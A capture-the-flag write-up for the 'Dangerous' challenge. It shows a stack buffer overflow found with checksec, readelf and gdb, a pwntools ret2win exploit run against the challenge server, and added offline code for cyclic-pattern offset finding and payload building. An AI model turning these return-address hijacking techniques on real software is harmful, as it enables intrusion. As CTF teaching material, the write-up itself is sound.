NahamCon CTF [Write-up]
Dangerous
$ file dangerous
dangerous: ELF 64-bit LSB executable, x86-64, version 1 (SYSV), dynamically linked, interpreter /lib64/ld-linux-x86-64.so.2, BuildID[sha1]=2b7e7edf071a5dd08228a996ed76400783fba08c, for GNU/Linux 3.2.0, stripped

$ checksec.sh --file=./dangerous
RELRO           STACK CANARY      NX            PIE             RPATH      RUNPATH      Symbols      FORTIFY  Fortified  Fortifiable  FILE
Partial RELRO   No canary found   NX enabled    No PIE          No RPATH   No RUNPATH   No Symbols   No       0          1            ./dangerous
No stack canary and no PIE: an overflow on the stack can overwrite the saved return address unhindered, and every address in the binary is fixed. NX only rules out running shellcode from the stack, which we will not need. First, confirm that there is a buffer overflow (BOF) at all by feeding the program an oversized name:
$ ./dangerous
What's your name? AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
It's dangerous to go alone! Take this, AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
 █ ███ ███ ███ ███ ███ ███ ███ ███ ███ ███████ █ ███ █ ███ ███ ███
Segmentation fault (core dumped)
$ readelf -r ./dangerous

Relocation section '.rela.dyn' at offset 0x550 contains 3 entries:
  Offset          Info           Type           Sym. Value    Sym. Name + Addend
000000403ff0  000500000006 R_X86_64_GLOB_DAT 0000000000000000 __libc_start_main@GLIBC_2.2.5 + 0
000000403ff8  000600000006 R_X86_64_GLOB_DAT 0000000000000000 __gmon_start__ + 0
000000404060  000900000005 R_X86_64_COPY     0000000000404060 stdout@GLIBC_2.2.5 + 0

Relocation section '.rela.plt' at offset 0x598 contains 6 entries:
  Offset          Info           Type           Sym. Value    Sym. Name + Addend
000000404018  000100000007 R_X86_64_JUMP_SLO 0000000000000000 puts@GLIBC_2.2.5 + 0
000000404020  000200000007 R_X86_64_JUMP_SLO 0000000000000000 strlen@GLIBC_2.2.5 + 0
000000404028  000300000007 R_X86_64_JUMP_SLO 0000000000000000 close@GLIBC_2.2.5 + 0
000000404030  000400000007 R_X86_64_JUMP_SLO 0000000000000000 read@GLIBC_2.2.5 + 0
000000404038  000700000007 R_X86_64_JUMP_SLO 0000000000000000 setvbuf@GLIBC_2.2.5 + 0
000000404040  000800000007 R_X86_64_JUMP_SLO 0000000000000000 open@GLIBC_2.2.5 + 0
Since open is among the imported functions, we can guess that some function in the binary opens flag.txt. As a sanity check, strings also turns up the string ./flag.txt:

$ strings ./dangerous
(snip)
What's your name?
Uh-oh... something's not right... good luck...
./flag.txt
:*3$"
GCC: (Ubuntu 9.2.1-9ubuntu2) 9.2.1 20191008
.shstrtab
.interp
.note.gnu.property
.note.gnu.build-id
.note.ABI-tag
.gnu.hash
.dynsym
.dynstr
.gnu.version
.gnu.version_r
.rela.dyn
.rela.plt
.init
.plt.sec
.text
.fini
.rodata
.eh_frame_hdr
.eh_frame
.init_array
.fini_array
.dynamic
All that is left is to find the address of the function that opens flag.txt and redirect execution to it with the BOF (a plain ret2win: no shellcode, no ROP chain beyond one address).

The binary is stripped, so there is no symbol to jump to. Walking through the code from the entry point in gdb, we find this:
gdb-peda$
   0x401312:    push   rbp
   0x401313:    mov    rbp,rsp
   0x401316:    sub    rsp,0x210
   0x40131d:    mov    esi,0x0
   0x401322:    lea    rdi,[rip+0xf16]        # 0x40223f
   0x401329:    mov    eax,0x0
   0x40132e:    call   0x4010e0 <open@plt>
   0x401333:    mov    DWORD PTR [rbp-0x4],eax
   0x401336:    lea    rcx,[rbp-0x210]
   0x40133d:    mov    eax,DWORD PTR [rbp-0x4]
   0x401340:    mov    edx,0x200
   0x401345:    mov    rsi,rcx
   0x401348:    mov    edi,eax
   0x40134a:    call   0x4010c0 <read@plt>
   0x40134f:    mov    eax,DWORD PTR [rbp-0x4]
   0x401352:    mov    edi,eax
   0x401354:    call   0x4010b0 <close@plt>
   0x401359:    lea    rax,[rbp-0x210]
   0x401360:    mov    rdi,rax
   0x401363:    call   0x401090 <puts@plt>
   0x401368:    nop
   0x401369:    leave
   0x40136a:    ret
This is the function we want. It calls open(path, 0) with esi = 0 (O_RDONLY) and rdi pointing at 0x40223f, which should be the ./flag.txt string seen in the strings output; it then read()s up to 0x200 bytes from that fd into the 0x210-byte stack buffer at rbp-0x210, close()s the fd, and puts() the buffer. Its first instruction, push rbp at 0x401312, is the address to return into. Note that the function never returns anywhere useful afterwards, which does not matter: the flag has already been printed by then.

The exploit code follows. ret_addr points at a bare ret instruction and is placed in front of the function address so that rsp is 16-byte aligned when the function is entered; without it, recent glibc's puts (which uses SSE instructions such as movaps on the stack) can crash before the flag is printed. The padding length 497 is the distance from the start of the name buffer to the saved return address.
from pwn import *

e = ELF('./dangerous')
#p = process('./dangerous')
p = remote('jh2i.com', 50011)

flag = 0x401312        # start of the function that opens ./flag.txt
ret_addr = 0x0040101a  # bare `ret` gadget: keeps rsp 16-byte aligned on entry

payload = b'A' * 497   # padding up to the saved return address
payload += p64(ret_addr)
payload += p64(flag)

p.sendline(payload)
p.interactive()
$ python solve.py
[*] Arch:     amd64-64-little
    RELRO:    Partial RELRO
    Stack:    No canary found
    NX:       NX enabled
    PIE:      No PIE (0x400000)
[+] Opening connection to jh2i.com on port 50011: Done
[*] Switching to interactive mode
What's your name? It's dangerous to go alone! Take this, AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
 █ ███ ███ ███ ███ ███ ███ ███ ███ ███ ███████ █ ███ █ ███ ███ ███
flag{legend_of_zelda_overflow_of_time}
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
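The write-up does not show how the 497-byte offset was measured. The following is an added example (my code, not the author's solve.py and not part of the challenge) that does the two mechanical steps of such an exploit offline, without pwntools: it generates a cyclic (de Bruijn) pattern to feed the program, recovers the offset from the 8 bytes that end up in the saved return address slot (as read from gdb or a core file after the crash), and then assembles the same padding + ret gadget + target payload as the author's script. The constants 497, 0x40101a and 0x401312 are taken from the exploit above; the "crash value" in the usage block is constructed from the pattern itself, not captured from the challenge binary.

```python
import string
import struct

ALPHABET = string.ascii_lowercase.encode()


def cyclic(length, alphabet=ALPHABET, n=4):
    """Return `length` bytes of a de Bruijn sequence in which every
    n-byte window is unique (same ordering as pwntools' cyclic())."""
    k = len(alphabet)
    a = [0] * (k * n)
    out = bytearray()

    def db(t, p):
        if len(out) >= length:          # stop as soon as we have enough
            return
        if t > n:
            if n % p == 0:
                out.extend(alphabet[i] for i in a[1:p + 1])
        else:
            a[t] = a[t - p]
            db(t + 1, p)
            for j in range(a[t - p] + 1, k):
                if len(out) >= length:
                    return
                a[t] = j
                db(t + 1, t)

    db(1, 1)
    return bytes(out[:length])


def cyclic_find(value, max_length=0x1000, n=4):
    """Map the bytes that landed in a register or saved slot back to their
    offset in the pattern. `value` is either the int gdb prints (e.g. the
    8 bytes at rsp when `ret` faults) or the raw bytes; only the first n
    bytes are needed because every n-byte window is unique.
    Returns -1 if the bytes did not come from the pattern."""
    if isinstance(value, int):
        value = value.to_bytes(8, "little")
    return cyclic(max_length, n=n).find(value[:n])


def build_payload(offset, ret_gadget, target, filler=b"A"):
    """padding | bare `ret` (16-byte stack re-alignment) | flag function."""
    return filler * offset + struct.pack("<Q", ret_gadget) + struct.pack("<Q", target)


def bad_byte_positions(payload, bad=b"\n"):
    """Offsets of bytes that would cut the input short if the target reads
    lines (gets/fgets). sendline() appends '\\n', so a 0x0a inside an
    address must be caught before sending. read() does not care."""
    return [i for i, b in enumerate(payload) if b in bad]


if __name__ == "__main__":
    # Step 1: send this instead of 'AAAA...' and crash the program.
    pattern = cyclic(600)
    # Step 2: constructed crash value, standing in for the 8 bytes gdb shows
    # in the saved-RIP slot of the real crash.
    fake_rip = int.from_bytes(pattern[497:505], "little")
    offset = cyclic_find(fake_rip)               # 497
    # Step 3: same payload as the write-up's solve.py.
    payload = build_payload(offset, 0x40101a, 0x401312)
    print("offset:", offset, "payload length:", len(payload))
    print("tail:", payload[-16:].hex(), "bad bytes at:", bad_byte_positions(payload))
```

The alignment gadget matters because the flag function's first instruction is push rbp; entering it through a corrupted return address leaves rsp at the opposite 16-byte parity from a normal call, and puts inside glibc will fault on a movaps if that parity is wrong. One extra ret flips the parity back without disturbing anything else.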